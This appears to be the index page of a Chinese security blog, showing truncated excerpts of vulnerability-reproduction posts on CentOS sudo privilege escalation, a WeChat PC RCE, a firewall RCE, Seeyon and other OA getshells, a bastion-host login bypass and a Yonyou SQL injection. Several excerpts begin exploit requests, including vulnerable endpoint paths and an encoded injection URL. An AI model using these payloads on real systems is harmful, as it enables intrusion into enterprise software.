Centos7/Centos8 sudo 提权脚本

https://www.o2oxy.cn/wp-content/uploads/2021/05/Centos提权.zip sudo版本和系统版本 [liang@iZwz91151k3ad6caoozz05Z ~]$ [liang@iZwz91151k3ad6caoozz05Z ~]$ sudo -V ...

微信RCE 复现

炒个冷饭。微信PC版本 3.0.57  演示的GIF html 源码 <html> <head> <metahttp-equiv="Content-Type"content="tex...

密码保护:某凌OA 前台未授权getshell

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx...

网康NS-NGFW防火墙远程RCE 漏洞复现

漏洞点在 /directdata/direct/router 具体包如下: POST /directdata/direct/router HTTP/1.1 Host: 192.168.10.6 Connection: close Cache-Control: max-age=0 sec-ch-ua: "Google...

Apache2.4 模块开发初探

一、开发文档 Apache 的开发文档:http://httpd.apache.org/docs/2.2/zh-cn/developer/ 二、、安装Apache  系统 Ubuntu 20.04.2 LTS 我这里使用的宝塔一键安装的编译环境...

某治堡垒机任意用户登录

HTTP://x.x.x.x/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm 状态码返回200,存在漏洞;“错误...

致远OA 前台getshell 复现

首先是一个获取管理cookie的漏洞。然后上传压缩文件进行解压。达到getshell的目的 POST /seeyon/thirdpartyController.do HTTP/1.1 Host: 192.168.10.2 User-Agent: python-requests/2.25....

用友 GRP-u8 SQL注入 漏洞复现

POST /Proxy HTTP/1.1 Host: 192.168.10.2:8025 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.1...